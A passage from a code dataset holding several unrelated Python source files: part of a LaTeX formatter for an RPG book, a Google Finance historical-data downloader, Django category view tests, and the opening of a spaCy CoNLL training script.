not None:\n self.latex_file.write(text.encode('utf8'))\n return\n\n\n start_index_entry = no_op\n def end_index_entry(self, index_entry):\n self.latex_file.write(\"\\\\index{%s}\" % strip_ws(index_entry.text))\n #self.latex_file.write(\"\\\\emph{%s}\" % strip_ws(defn.tail))\n ## self.latex_file.write(strip_ws(defn.text))\n ## self.latex_file.write(\"} \")\n ## #self.latex_file.write(\"\\\\emph{%s}\" % strip_ws(defn.text))\n ## self.latex_file.write(strip_ws(defn.tail))\n return\n\n def start_defn(self, defn):\n #self.latex_file.write(\"\\\\emph{\")\n return\n\n def end_defn(self, defn):\n self.latex_file.write(\"\\\\emph{%s}\\\\index{%s}\" % (strip_ws(defn.text),\n strip_ws(defn.text)))\n ## self.latex_file.write(\"\\\\emph{%s}\\\\index{%s}%s\" % (strip_ws(defn.text),\n ## strip_ws(defn.text),\n ## defn.tail))\n #self.latex_file.write(\"\\\\emph{%s}\" % strip_ws(defn.tail))\n ## self.latex_file.write(strip_ws(defn.text))\n ## self.latex_file.write(\"} \")\n ## #self.latex_file.write(\"\\\\emph{%s}\" % strip_ws(defn.text))\n ## self.latex_file.write(strip_ws(defn.tail))\n return\n\n def start_chapter(self, chapter):\n title_element = chapter.find(\"chaptertitle\")\n if title_element is None:\n title = \"\"\n else:\n title = title_element.text\n self.latex_file.write(\"\\\\chapter{%s}\\n\" % title)\n return\n\n def end_chapter(self, chapter):\n # remember to drop cap the first letter of the word in this chapter\n self._drop_capped_first_letter_of_chapter = False\n return\n\n def start_paragraph(self, paragraph):\n self.latex_file.write(\"\\n\\n\")\n\n # add drop caps to the first word of every chapter\n if not self._drop_capped_first_letter_of_chapter:\n self._drop_capped_first_letter_of_chapter = True\n words = paragraph.text.split()\n if len(words) > 0:\n first_word = words[0]\n if len(first_word) > 0:\n first_letter = first_word[0]\n other_letters = first_word[1:]\n\n drop_cap_word = (\"\\\\lettrine[\"\n \"lines=2, \"\n \"lraise=0.1, \"\n # horizontal displacement of the indented text\n \"findent=-0.14em, \" \n \"nindent=0.3em, \"\n \"slope=0em]{\\\\rpgdropcapfont %s}{%s}\" %\n (first_letter, other_letters))\n\n words = [drop_cap_word, ] + words[1:]\n\n text = \" \".join(words)\n else:\n text = paragraph.text\n\n self.latex_file.write(text) \n return\n\n def end_paragraph(self, paragraph):\n self.latex_file.write(\"\\n\\n\")\n return\n\n\n def start_design(self, design):\n if settings.print_design_notes:\n self.latex_file.write(\"\\n\\n\")\n self.latex_file.write(design.text) \n return\n\n def end_design(self, design):\n self.latex_file.write(\"\\n\\n\")\n return\n\n\n def start_provenance(self, provenance):\n self.latex_file.write(\"\\n\\n\") \n #self.latex_file.write(\"\\\\begin{quote}\")\n\n if settings.print_provenence_notes:\n self.latex_file.write(\"\\\\begin{center}\")\n self.latex_file.write(\"\\\\begin{minipage}[c]{0.9\\linewidth}\")\n # self.latex_file.write(\"\\\\emph{\")\n self.latex_file.write(\"\\\\rpgprovenancesymbol\\\\hspace{0.2em}\") \n self.latex_file.write(provenance.text) \n return\n\n def end_provenance(self, provenance):\n #self.latex_file.write(\"}\") \n if settings.print_provenence_notes:\n self.latex_file.write(\"\\\\end{minipage}\") \n self.latex_file.write(\"\\\\end{center}\")\n self.latex_file.write(\"\\n\\n\")\n return\n\n\n def start_author(self, author):\n self.latex_file.write(\"{\\\\Large \\\\rpgtitleauthorfont %s}\\\\\\\\\" % author.text) \n #self.latex_file.write(\"{\\\\begin{easteregg}\\\\Large \\\\rpgtitleauthorfont %s\\\\end{easteregg}}\\\\\\\\\" % author.text) \n return\n\n def end_author(self, author):\n return\n\n def start_title(self, title):\n self.latex_file.write(\"{ \\\\color{rpgtitlefontcolor} \\\\rpgtitlefont %s }\\\\\\\\\\n\"\n % title.text)\n return\n\n def end_title(self, title):\n return\n\n def start_subtitle(self, subtitle): \n self.latex_file.write(\"{\\\\large \\\\rpgtitlesubtitlefont %s}\\\\\\\\\\n\" % subtitle.text)\n return\n\n def end_subtitle(self, title):\n return\n \n def start_chapter_title(self, chapter_title):\n return\n\n def end_chapter_title(self, chapter_title):\n return\n\n\n def start_section_title(self, section_title):\n return\n\n def end_section_title(self, section_title):\n return\n\n def start_img(self, img):\n\n if settings.debug_outline_images:\n self.latex_file.write(\"\\\\fbox{\")\n\n \n self.latex_file.write(\"\\\\includegraphics[scale=%s]{%s}\"\n % (img.get(\"scale\", default=\"1.0\"), img.get(\"src\")))\n \n if settings.debug_outline_images:\n self.latex_file.write(\"}\")\n\n self.latex_file.write(\"\\\\\\\\\\n\")\n return\n\n def end_img(self, img):\n return\n\n def start_figure(self, figure):\n #self.latex_file.write(\"\\\\begin{wrapfigure}{h}{0.5\\\\linewidth}\\n\")\n self.latex_file.write(\"\\\\begin{figure}\\n\")\n self.latex_file.write(\"\\\\centering\\n\")\n #self.latex_file.write(\"%s\\n\" % figure.text)\n self.latex_file.write(\"\\\\includegraphics[scale=0.36]{%s}\\n\"\n % (figure.get(\"src\")))\n\n caption = figure.get(\"caption\")\n if caption is not None:\n self.latex_file.write(\"\\\\caption{%s}\\n\" % caption)\n return\n\n def end_figure(self, figure):\n #self.latex_file.write(\"\\\\end{wrapfigure}\\n\")\n self.latex_file.write(\"\\\\end{figure}\\n\")\n return\n\n def start_enumeration(self, enumeration):\n # the [i] gets us roman numerals in the enumeration\n self.latex_file.write(\"\\\\begin{enumerate}[i.]\\n\")\n return\n\n def end_enumeration(self, enumeration):\n self.latex_file.write(\"\\\\end{enumerate}\\n\")\n return\n\n def start_descriptions(self, description_list):\n self.latex_file.write(\"\\\\begin{description}\\n\")\n return\n\n def end_descriptions(self, description_list):\n self.latex_file.write(\"\\\\end{description}\\n\")\n return\n\n def start_list_item(self, list_item):\n self.latex_file.write(\"\\\\item \")\n self.latex_file.write(list_item.text)\n return\n\n def end_list_item(self, list_item):\n return\n\n def start_description(self, description):\n self.latex_file.write(\"%s\" % description.text)\n return\n\n def end_description(self, list_item):\n return\n\n def start_description_term(self, term):\n self.latex_file.write(\"\\\\item[%s]\" % term.text)\n return\n\n def end_description_term(self, list_item):\n return\n\n\n def start_list(self, list_element):\n self.latex_file.write(\"\\\\begin{itemize}\\n\")\n return\n\n def end_list(self, list_element):\n self.latex_file.write(\"\\\\end{itemize}\\n\")\n return\n\n def start_list_item(self, list_item):\n self.latex_file.write(\"\\\\item \")\n self.latex_file.write(list_item.text)\n return\n\n def end_list_item(self, list_item):\n return\n\n def start_comment(self, comment):\n return\n\n def end_comment(self, comment):\n return\n\n\n\n def start_table(self, table):\n\n # we need to work out in advance the table layout (e.g. |c|c|c| or whatever).\n header = table.find(\"tableheader\")\n table_spec = \"\"\n self._number_of_columns_in_table = 0\n self._current_column_in_table = 0\n self._current_row_in_table = 0\n\n for child in header.iterchildren():\n assert child.tag == \"td\" \n self._number_of_columns_in_table += 1\n width = child.get(\"width\")\n if width == \"fit\":\n table_spec += \"p{\\\\widthof{child.text}}\"\n else:\n table_spec += \"X\"\n\n self.latex_file.write(\"\\\\begin{table}\\n\")\n self.latex_file.write(\"\\\\begin{tabularx}{0.9\\\\linewidth}{%s} \\\\toprule\\n\" % table_spec)\n return\n\n def end_table(self, table):\n self.latex_file.write(\"\\\\bottomrule \\n\"\n \"\\\\end{tabularx}\\n\"\n \"\\n\")\n\n table_title = table.find(\"tabletitle\")\n self.latex_file.write(\"\\\\caption{%s}\\n\" % table_title.text) \n self.latex_file.write(\"\\\\end{table}\\n\") \n return\n\n ## def start_table_title(self, table_of_contents):\n ## self.latex_file.write(\"\\\\begin{rpgtable}\\n\")\n ## return\n\n start_table_title = no_op\n end_table_title = no_op\n ## def end_table_title(self, table_title):\n ## #self.latex_file.write(\"\\\\caption{%s}\\n\" % table_title.text)\n ## return\n\n def start_table_header(self, table_header):\n self.latex_file.write(\"\\\\rowcolor{blue!33} \\n\")\n return\n\n def end_table_header(self, table_header):\n self.latex_file.write(\" \\\\\\\\\\n\")\n #self.latex_file.write(\"\\\\caption{%s}\\n\" % table_title.text)\n return\n\n\n def start_table_row(self, table_of_contents):\n self._current_row_in_table += 1\n\n if (self._current_row_in_table + 1) % 2 == 1: \n self.latex_file.write(\"\\\\rowcolor{blue!20} \\n\")\n else:\n #self.latex_file.write(\"\\\\rowcolor{yellow!50} \\n\")\n pass\n return\n\n def end_table_row(self, table_title):\n self.latex_file.write(\" \\\\\\\\\\n\")\n #self.latex_file.write(\"\\\\caption{%s}\\n\" % table_title.text)\n return\n\n def start_table_data(self, table_data):\n\n self._current_column_in_table = (\n (self._current_column_in_table + 1) % self._number_of_columns_in_table)\n\n if self._current_row_in_table == 0:\n self.latex_file.write(\"\\\\rpgtableheader{%s} \\n\" %\n table_data.text)\n else:\n self.latex_file.write(\"%s\" % table_data.text)\n\n if self._current_column_in_table != 0:\n self.latex_file.write(\" & \\n\")\n \n return\n\n end_table_data = no_op\n ## def (self, table_title):\n ## #self.latex_file.write(\"\\\\caption{%s}\\n\" % table_title.text)\n ## return\n\n\n def start_table_of_contents(self, table_of_contents):\n self.latex_file.write(\"\\\\tableofcontents\\n\")\n return\n\n def end_table_of_contents(self, table_of_contents):\n return\n\n def start_list_of_figures(self, list_of_figures):\n self.latex_file.write(\"\\\\listoffigures\\n\")\n return\n\n def end_list_of_figures(self, list_of_figures):\n return\n\n def start_list_of_tables(self, list_of_tables):\n self.latex_file.write(\"\\\\listoftables\\n\")\n return\n\n def end_list_of_tables(self, list_of_tables):\n return\n\n def start_combat_symbol(self, combat_symbol):\n #self.latex_file.write(\"\\\\rpgcombatsymbol\\\\ %s\" % combat_symbol.tail)\n self.latex_file.write(\"\\\\rpgcombatsymbol\\\\ \")\n return\n end_combat_symbol = no_op\n\n def start_training_symbol(self, training_symbol):\n #self.latex_file.write(\"\\\\rpgtrainingsymbol\\\\ %s\" % training_symbol.tail)\n self.latex_file.write(\"\\\\rpgtrainingsymbol\\\\ \")\n return\n end_training_symbol = no_op\n\n def start_learning_symbol(self, learning_symbol):\n #self.latex_file.write(\"\\\\rpglearningsymbol\\\\ %s\" % learning_symbol.tail)\n self.latex_file.write(\"\\\\rpglearningsymbol\\\\ \")\n return\n end_learning_symbol = no_op\n\n\n\n def start_success(self, success):\n #self.latex_file.write(\"\\\\rpgsuccess\\\\ %s\" % success.tail)\n self.latex_file.write(\"\\\\rpgsuccess\\\\ \")\n return\n end_success = no_op\n\n def start_fail(self, fail):\n #self.latex_file.write(\"\\\\rpgfail\\\\ %s\" % fail.tail)\n self.latex_file.write(\"\\\\rpgfail\\\\ \")\n return\n end_fail = no_op\n\n\n def start_unknown(self, unknown):\n raise Exception(\"UNKNOWN (%s) %s\\n\" % (unknown.tag, str(unknown)))\n return\n\n def end_unknown(self, unknown):\n raise Exception(\"UNKNOWN (%s) %s\\n\" % (unknown.tag, str(unknown)))\n return\n\n def start_vspace(self, vspace):\n self.latex_file.write(\"\\\\vspace{%s\\drop}\\n\" % int(vspace.text))\n return\n\n def end_vspace(self, vspace):\n return\n", "sub_path": "src/latex_formatter.py", "file_name": "latex_formatter.py", "file_ext": "py", "file_size_in_byte": 31771, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "zope.interface.verify.verifyObject", "line_number": 61, "usage_type": "call"}, {"api_name": "i_formatter.IFormatter", "line_number": 61, "usage_type": "argument"}, {"api_name": "settings.paper_size", "line_number": 72, "usage_type": "attribute"}, {"api_name": "settings.paper_size", "line_number": 74, "usage_type": "attribute"}, {"api_name": "settings.display_page_background", "line_number": 321, "usage_type": "attribute"}, {"api_name": "settings.print_design_notes", "line_number": 636, "usage_type": "attribute"}, {"api_name": "settings.print_provenence_notes", "line_number": 650, "usage_type": "attribute"}, {"api_name": "settings.print_provenence_notes", "line_number": 660, "usage_type": "attribute"}, {"api_name": "settings.debug_outline_images", "line_number": 705, "usage_type": "attribute"}, {"api_name": "settings.debug_outline_images", "line_number": 712, "usage_type": "attribute"}]} +{"seq_id": "412445997", "text": "__author__ = 'Julien Heck'\n\n\"\"\"\nGoogleFinance.py\nGoogleFinance class\n\"\"\"\n\nimport urllib.request\nimport datetime\nimport logging\n\nclass GoogleFinance:\n \"\"\"\n Connect to google finance url and download stock data\n \"\"\"\n\n def __init__(self, symbol=None, start_date=None):\n \"\"\"\n Class constructor\n :param symbol: string of stock symbol\n :param start_date: struct_time object, start date of the stock data\n :return:\n \"\"\"\n self.symbol = symbol.upper()\n self.start_date = start_date\n # Create URL based on parameters symbol and start_date\n self.base_url = \"http://www.google.com/finance/historical?q=\"\n logging.info(\"GoogleFinance instance created for {0} stocks starting from {1}-{2}-{3}\"\n .format(self.symbol, self.start_date.tm_year, self.start_date.tm_mon, self.start_date.tm_mday))\n\n def get_historical_data(self, filename=None):\n \"\"\"\n :param filename: string of file name of output data\n :return: write data retrieved from base_url to filename\n \"\"\"\n today_date = datetime.datetime.today().date()\n success = True\n # Create URL string based on symbol, start date and today's date\n try:\n start_date_str = \"{0}-{1}-{2}\".format(self.start_date.tm_year, self.start_date.tm_mon, self.start_date.tm_mday)\n url_str = (self.base_url + self.symbol + \"&startdate=\"\n + start_date_str\n + \"&enddate={}\".format(today_date) + \"&output=csv\")\n logging.info(\"Accessing url: {0}\".format(url_str))\n # Connect to URL and download data\n url_data = urllib.request.urlopen(url_str)\n csv = (url_data.read()).decode(\"utf-8-sig\").encode(\"utf-8\")\n except:\n message = \"Failed to connect to URL\"\n print(message)\n logging.error(message)\n success = False\n # Write output to file if file name is not null\n if filename is not None:\n try:\n parse_file = open(filename, \"w\")\n str_response = csv.decode('utf-8')\n print(str_response, file=parse_file)\n parse_file.close()\n except:\n message = \"Failed to open/write to file: {0}\".format(filename)\n print(message)\n logging.error(message)\n success = False\n return success", "sub_path": "Python Programming I/GoogleFinance.py", "file_name": "GoogleFinance.py", "file_ext": "py", "file_size_in_byte": 2451, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.info", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 46, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 46, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 46, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 51, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "294910166", "text": "from django.core.urlresolvers import reverse\r\nfrom django.contrib.auth.models import User\r\n\r\nfrom epic.categories.constants import NO_CATEGORY\r\nfrom epic.categories.models import Category\r\nfrom epic.categories.models import CannotDeleteNoCategoryException\r\nfrom epic.core.test import CustomTestCase\r\nfrom epic.core.util.view_utils import *\r\nfrom epic.datarequests.models import DataRequest\r\nfrom epic.datasets.models import DataSet\r\nfrom epic.projects.models import Project\r\n\r\n\r\nclass ViewCategoriesTestCase(CustomTestCase):\r\n def setUp(self):\r\n self.view_categories_url = \\\r\n reverse('epic.categories.views.view_categories')\r\n \r\n def testNoCategoriesExist(self):\r\n Category.objects.all().delete()\r\n \r\n response = self.client.get(self.view_categories_url)\r\n self.assertContains(response,\r\n 'There are currently no categories available.')\r\n \r\n def testCategoriesExist(self):\r\n category = Category.objects.create(name='Test Category',\r\n description='Test Description')\r\n \r\n response = self.client.get(self.view_categories_url)\r\n self.assertContains(response, category.name)\r\n\r\nclass ViewItemsForCategoryTestCase(CustomTestCase):\r\n \r\n fixtures = ['categories_categories']\r\n \r\n def setUp(self):\r\n self.category1 = Category.objects.get(name='Test Category1')\r\n self.datasets = DataSet.objects.filter(category=self.category1)\r\n self.projects = Project.objects.filter(category=self.category1)\r\n self.datarequests = \\\r\n DataRequest.objects.filter(category=self.category1)\r\n \r\n self.view_all_items_url = reverse(\r\n 'epic.categories.views.view_items_for_category',\r\n kwargs={'category_id': self.category1.id})\r\n \r\n self.view_datasets_url = reverse(\r\n 'epic.categories.views.view_datasets_for_category',\r\n kwargs={'category_id': self.category1.id})\r\n \r\n self.view_projects_url = reverse(\r\n 'epic.categories.views.view_projects_for_category',\r\n kwargs={'category_id': self.category1.id})\r\n \r\n self.view_datarequests_url = reverse(\r\n 'epic.categories.views.view_datarequests_for_category',\r\n kwargs={'category_id': self.category1.id})\r\n \r\n def testInvalidCategory(self):\r\n invalid_all_items_for_category_url = reverse(\r\n 'epic.categories.views.view_items_for_category',\r\n kwargs={'category_id': 1337})\r\n all_items_response = \\\r\n self.client.get(invalid_all_items_for_category_url)\r\n self.assertStatusCodeIsAFailure(all_items_response.status_code)\r\n \r\n invalid_datasets_for_category_url = reverse(\r\n 'epic.categories.views.view_datasets_for_category',\r\n kwargs={'category_id': 1337})\r\n datasets_response = \\\r\n self.client.get(invalid_datasets_for_category_url)\r\n self.assertStatusCodeIsAFailure(datasets_response.status_code)\r\n \r\n invalid_projects_for_category_url = reverse(\r\n 'epic.categories.views.view_projects_for_category',\r\n kwargs={'category_id': 1337})\r\n projects_response = \\\r\n self.client.get(invalid_projects_for_category_url)\r\n self.assertStatusCodeIsAFailure(projects_response.status_code)\r\n \r\n invalid_datarequests_for_category_url = reverse(\r\n 'epic.categories.views.view_datarequests_for_category',\r\n kwargs={'category_id': 1337})\r\n datarequests_response = \\\r\n self.client.get(invalid_datarequests_for_category_url)\r\n self.assertStatusCodeIsAFailure(datarequests_response.status_code)\r\n \r\n \"\"\"\r\n NOTE: these tests will fail once we implement pagination,\r\n since not all items will be displayed on the first page.\r\n \"\"\"\r\n \r\n def testAllItemsInValidCategory(self):\r\n datasets = self.datasets.all()\r\n projects = self.projects.all()\r\n datarequests = self.projects.all()\r\n \r\n response = self.client.get(self.view_all_items_url)\r\n \r\n for dataset in datasets:\r\n self.assertContains(response, dataset.name)\r\n \r\n for project in projects:\r\n self.assertContains(response, project.name)\r\n \r\n for datarequest in datarequests:\r\n self.assertContains(response, datarequest.name)\r\n \r\n def testDatasetsInValidCategory(self):\r\n datasets = list(self.datasets.all())\r\n \r\n response = self.client.get(self.view_datasets_url)\r\n \r\n for dataset in datasets:\r\n self.assertContains(response, dataset.name)\r\n\r\n def testDataRequestsInValidCategory(self):\r\n datarequests = list(self.datarequests.all())\r\n \r\n response = self.client.get(self.view_datarequests_url)\r\n \r\n for datarequest in datarequests:\r\n self.assertContains(response, datarequest.name)\r\n\r\n def testProjectsInValidCategory(self):\r\n projects = list(self.projects.all())\r\n \r\n response = self.client.get(self.view_projects_url)\r\n \r\n for project in projects:\r\n self.assertContains(response, project.name)\r\n \r\nclass CategoryTemplateTagsTestCase(CustomTestCase):\r\n fixtures = ['categories_categories']\r\n \r\n def setUp(self):\r\n self.category1 = Category.objects.get(name='Test Category1')\r\n self.category2 = Category.objects.get(name='Test Category2')\r\n self.dataset = DataSet.objects.active()[0]\r\n self.project = Project.objects.active()[0]\r\n self.datarequest = DataRequest.objects.active()[0]\r\n \r\n self.view_categories_url = \\\r\n reverse('epic.categories.views.view_categories')\r\n \r\n self.view_all_items_url = reverse(\r\n 'epic.categories.views.view_items_for_category',\r\n kwargs={'category_id': self.category1.id})\r\n \r\n self.view_dataset_url = \\\r\n get_item_url(self.dataset, 'epic.datasets.views.view_dataset')\r\n \r\n self.view_project_url = \\\r\n get_item_url(self.project, 'epic.projects.views.view_project')\r\n \r\n self.view_datarequest_url = get_item_url(\r\n self.datarequest, 'epic.datarequests.views.view_datarequest')\r\n \r\n def testCategories(self):\r\n response = self.client.get(self.view_categories_url)\r\n self.assertStatusCodeIsASuccess(response.status_code)\r\n self.assertContains(response, self.category1.name)\r\n self.assertContains(response, self.category2.name)\r\n \r\n def testCategoryListingInItemHeaders(self):\r\n view_category_url = '' % self.view_all_items_url\r\n \r\n dataset_response = self.client.get(self.view_dataset_url)\r\n self.assertContains(dataset_response, view_category_url)\r\n \r\n project_response = self.client.get(self.view_project_url)\r\n self.assertContains(project_response, view_category_url)\r\n \r\n datarequest_response = self.client.get(self.view_datarequest_url)\r\n self.assertContains(datarequest_response, view_category_url)\r\n\r\nclass DeleteCategoryTestCase(CustomTestCase):\r\n fixtures = ['categories_categories']\r\n \r\n def setUp(self):\r\n self.bob = User.objects.get(username='bob')\r\n self.category = Category.objects.create(name='category1',\r\n description='category2')\r\n self.dataset_name = 'a38yyth'\r\n self.dataset_description = 'asd09g4h6'\r\n self.dataset = DataSet.objects.create(\r\n name=self.dataset_name,\r\n description=self.dataset_description,\r\n category=self.category,\r\n creator=self.bob)\r\n \r\n def testDeleting(self):\r\n # I've overwritten the delete method so make sure that\r\n # deleting a category won't delete the dataset attached to it.\r\n self.category.delete()\r\n \r\n try:\r\n dataset = DataSet.objects.get(\r\n name=self.dataset_name,\r\n description=self.dataset_description,\r\n creator=self.bob)\r\n except DataSet.DoesNotExist:\r\n self.fail()\r\n \r\n def testDeletingNoCategory(self):\r\n no_category = Category.objects.get(name=NO_CATEGORY)\r\n test_passed = False\r\n \r\n try:\r\n no_category.delete()\r\n except CannotDeleteNoCategoryException:\r\n test_passed = True\r\n \r\n self.failIfNot(test_passed)\r\n", "sub_path": "tags/epic/sprint3_2010-04-08/categories/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 8669, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "epic.core.test.CustomTestCase", "line_number": 14, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 17, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects.all", "line_number": 20, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 20, "usage_type": "name"}, {"api_name": "epic.categories.models.Category.objects.create", "line_number": 27, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 27, "usage_type": "name"}, {"api_name": "epic.core.test.CustomTestCase", "line_number": 33, "usage_type": "name"}, {"api_name": "epic.categories.models.Category.objects.get", "line_number": 38, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 38, "usage_type": "name"}, {"api_name": "epic.datasets.models.DataSet.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "epic.datasets.models.DataSet.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "epic.datasets.models.DataSet", "line_number": 39, "usage_type": "name"}, {"api_name": "epic.projects.models.Project.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "epic.projects.models.Project.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "epic.projects.models.Project", "line_number": 40, "usage_type": "name"}, {"api_name": "epic.datarequests.models.DataRequest.objects.filter", "line_number": 42, "usage_type": "call"}, {"api_name": "epic.datarequests.models.DataRequest.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "epic.datarequests.models.DataRequest", "line_number": 42, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 44, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 48, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 56, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 61, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 68, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 75, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 82, "usage_type": "call"}, {"api_name": "epic.core.test.CustomTestCase", "line_number": 134, "usage_type": "name"}, {"api_name": "epic.categories.models.Category.objects.get", "line_number": 138, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 138, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 138, "usage_type": "name"}, {"api_name": "epic.categories.models.Category.objects.get", "line_number": 139, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 139, "usage_type": "name"}, {"api_name": "epic.datasets.models.DataSet.objects.active", "line_number": 140, "usage_type": "call"}, {"api_name": "epic.datasets.models.DataSet.objects", "line_number": 140, "usage_type": "attribute"}, {"api_name": "epic.datasets.models.DataSet", "line_number": 140, "usage_type": "name"}, {"api_name": "epic.projects.models.Project.objects.active", "line_number": 141, "usage_type": "call"}, {"api_name": "epic.projects.models.Project.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "epic.projects.models.Project", "line_number": 141, "usage_type": "name"}, {"api_name": "epic.datarequests.models.DataRequest.objects.active", "line_number": 142, "usage_type": "call"}, {"api_name": "epic.datarequests.models.DataRequest.objects", "line_number": 142, "usage_type": "attribute"}, {"api_name": "epic.datarequests.models.DataRequest", "line_number": 142, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 145, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 147, "usage_type": "call"}, {"api_name": "epic.core.test.CustomTestCase", "line_number": 178, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 182, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 182, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 182, "usage_type": "name"}, {"api_name": "epic.categories.models.Category.objects.create", "line_number": 183, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 183, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 183, "usage_type": "name"}, {"api_name": "epic.datasets.models.DataSet.objects.create", "line_number": 187, "usage_type": "call"}, {"api_name": "epic.datasets.models.DataSet.objects", "line_number": 187, "usage_type": "attribute"}, {"api_name": "epic.datasets.models.DataSet", "line_number": 187, "usage_type": "name"}, {"api_name": "epic.datasets.models.DataSet.objects.get", "line_number": 199, "usage_type": "call"}, {"api_name": "epic.datasets.models.DataSet.objects", "line_number": 199, "usage_type": "attribute"}, {"api_name": "epic.datasets.models.DataSet", "line_number": 199, "usage_type": "name"}, {"api_name": "epic.datasets.models.DataSet.DoesNotExist", "line_number": 203, "usage_type": "attribute"}, {"api_name": "epic.datasets.models.DataSet", "line_number": 203, "usage_type": "name"}, {"api_name": "epic.categories.models.Category.objects.get", "line_number": 207, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 207, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 207, "usage_type": "name"}, {"api_name": "epic.categories.constants.NO_CATEGORY", "line_number": 207, "usage_type": "name"}, {"api_name": "epic.categories.models.CannotDeleteNoCategoryException", "line_number": 212, "usage_type": "name"}]} +{"seq_id": "227061763", "text": "'''Train for CONLL 2017 UD treebank evaluation. Takes .conllu files, writes\n.conllu format for development data, allowing the official scorer to be used.\n'''\nfrom __future__ import unicode_literals\nimport plac\nimport tqdm\nimport re\nimport sys\nimport spacy\nimport spacy.util\nfrom spacy.tokens import Doc\nfrom spacy.gold import GoldParse, minibatch\nfrom spacy.syntax.nonproj import projectivize\nfrom collections import Counter\nfrom timeit import default_timer as timer\n\nimport random\nimport numpy.random\n\nfrom spacy._align import align\n\nrandom.seed(0)\nnumpy.random.seed(0)\n\ndef prevent_bad_sentences(doc):\n '''This is an example pipeline component for fixing sentence segmentation\n mistakes. The component sets is_sent_start to False, which means the\n parser will be prevented from making a sentence boundary there. The\n rules here aren't necessarily a good idea.'''\n for token in doc[1:]:\n if token.nbor(-1).text == ',':\n token.is_sent_start = False\n elif not token.nbor(-1).whitespace_:\n token.is_sent_start = False\n elif not token.nbor(-1).is_punct:\n token.is_sent_start = False\n elif token.nbor(-1).is_left_punct:\n token.is_sent_start = False\n return doc\n\n\ndef load_model(lang):\n '''This shows how to adjust the tokenization rules, to special-case\n for ways the CoNLLU tokenization differs. We need to get the tokenizer\n accuracy high on the various treebanks in order to do well. If we don't\n align on a content word, all dependencies to and from that word will\n be marked as incorrect.\n '''\n English = spacy.util.get_lang_class(lang)\n English.Defaults.token_match = re.compile(r'=+|!+|\\?+|\\*+|_+').match\n nlp = English()\n nlp.tokenizer.add_special_case('***', [{'ORTH': '***'}])\n nlp.tokenizer.add_special_case(\"):\", [{'ORTH': \")\"}, {\"ORTH\": \":\"}])\n nlp.tokenizer.add_special_case(\"and/or\", [{'ORTH': \"and\"}, {\"ORTH\": \"/\"}, {\"ORTH\": \"or\"}])\n nlp.tokenizer.add_special_case(\"non-Microsoft\", [{'ORTH': \"non-Microsoft\"}])\n nlp.tokenizer.add_special_case(\"mis-matches\", [{'ORTH': \"mis-matches\"}])\n nlp.tokenizer.add_special_case(\"X.\", [{'ORTH': \"X\"}, {\"ORTH\": \".\"}])\n nlp.tokenizer.add_special_case(\"b/c\", [{'ORTH': \"b/c\"}])\n return nlp\n \n\ndef get_token_acc(docs, golds):\n '''Quick function to evaluate tokenization accuracy.'''\n miss = 0\n hit = 0\n for doc, gold in zip(docs, golds):\n for i in range(len(doc)):\n token = doc[i]\n align = gold.words[i]\n if align == None:\n miss += 1\n else:\n hit += 1\n return miss, hit\n\n\ndef golds_to_gold_tuples(docs, golds):\n '''Get out the annoying 'tuples' format used by begin_training, given the\n GoldParse objects.'''\n tuples = []\n for doc, gold in zip(docs, golds):\n text = doc.text\n ids, words, tags, heads, labels, iob = zip(*gold.orig_annot)\n sents = [((ids, words, tags, heads, labels, 